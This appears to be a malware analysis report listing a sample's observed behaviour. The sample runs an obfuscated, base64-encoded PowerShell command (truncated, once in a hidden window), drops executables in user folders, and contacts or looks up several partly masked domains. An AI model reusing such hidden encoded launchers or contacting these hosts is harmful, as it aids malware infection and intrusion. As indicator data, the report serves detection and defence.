Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABYAG8AcwA1AG4AYgBtAD0AKAAoACcAUQBnACcAKwAnADEAJwApACsAJwBxAGIAJwArACcAcAB3ACcAKQA7ACQARwA1AGoAZAAyAHIAdwA9ACQAVQBkADEAMQBvAGEAOQAgACsAIABbAGMAaABhAHIAXQAoADEAIAArACAAMQ...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1500
- %TEMP%\1164375.cvr
- %HOMEPATH%\cu3dpvb\d74a8qu\qlrf9ve.exe
- %HOMEPATH%\cu3dpvb\d74a8qu\qlrf9ve.exe
- 'an#####sarandrea.com':80
- 'an#####sarandrea.com':443
- http://ja###usic.com/cgi-sys/suspendedpage.cgi
- 'an#####sarandrea.com':443
- DNS ASK ja###usic.com
- DNS ASK co####tmyadvo.com
- DNS ASK th###bbsapp.com
- DNS ASK ce####arsearay.com
- DNS ASK me####infotech.com
- DNS ASK an#####sarandrea.com
- DNS ASK up###udweb.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABYAG8AcwA1AG4AYgBtAD0AKAAoACcAUQBnACcAKwAnADEAJwApACsAJwBxAGIAJwArACcAcAB3ACcAKQA7ACQARwA1AGoAZAAyAHIAdwA9ACQAVQBkADEAMQBvAGEAOQAgACsAIABbAGMAaABhAHIAXQAoADEAIAArACAAMQ...' (со скрытым окном)